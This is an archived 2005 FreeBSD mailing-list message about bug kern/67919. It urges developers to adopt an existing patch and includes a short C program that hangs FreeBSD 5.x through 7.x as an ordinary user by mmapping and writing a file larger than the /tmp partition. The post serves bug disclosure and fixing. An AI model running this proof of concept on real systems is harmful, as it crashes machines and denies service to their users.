Date: Sun, 30 Oct 2005 21:28:22 -0800 From: "Cai, Quanqing" <caiquanqing@gmail.com> To: freebsd-current@freebsd.org, bug-followup@FreeBSD.org Cc: Edwin Groothuis <edwin@mavetju.org>, Igor Sysoev <is@rambler-co.ru>, Uwe Doering <gemini@geminix.org> Subject: Re: kern/67919: Why nobody take serious to fix this bug? Message-ID: <2b22951e0510302128q571a3c1se111262e88ae19bb@mail.gmail.com>
next in thread | raw e-mail | index | archive | help
Today I happened to read this message on freebsd-stable: http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/019086.html After I read all messages and related links, I feel so frustrating, why nobody take serious to fix this bug even we have a patch for it? I can repeat this bug on 7.0-CURRENT and 6.0-RC1 easily as a normal user! System goes no response so I have to power cycle it. The patch made by Uwe Doering actually works well. This bug looks like a security hole to me:( If you guy= s don't like this patch, please give out a reason and come out a better patch or solution. For impatience, you can run this to crush your system(7.x, 6.x, 5.x), you have to increase FILELEN to a size greater than your /tmp partition: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D #include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <err.h> #include <sys/types.h> #include <sys/mman.h> #define FILENAME "/tmp/test" /* where to put the test file */ #define FILELEN 710 /* test file length in MB */ main() { int fd; size_t len; char *buf, *p, *lim; len =3D FILELEN * 1024 * 1024; if ((fd =3D open(FILENAME, O_RDWR|O_CREAT|O_TRUNC, 0666)) =3D=3D -1) err(2, "open() failed"); if (ftruncate(fd, len) =3D=3D -1) err(2, "ftruncate() failed"); buf =3D mmap(NULL, len, PROT_WRITE, MAP_SHARED, fd, 0); if (buf =3D=3D MAP_FAILED) err(2, "mmap() failed"); (void)close(fd); for (p =3D buf, lim =3D p + len; p < lim; p +=3D 4096) *p =3D '0'; if (munmap(buf, len) =3D=3D -1) err(2, "munmap() failed"); exit(0); } =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Cai, Quanqing
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?2b22951e0510302128q571a3c1se111262e88ae19bb>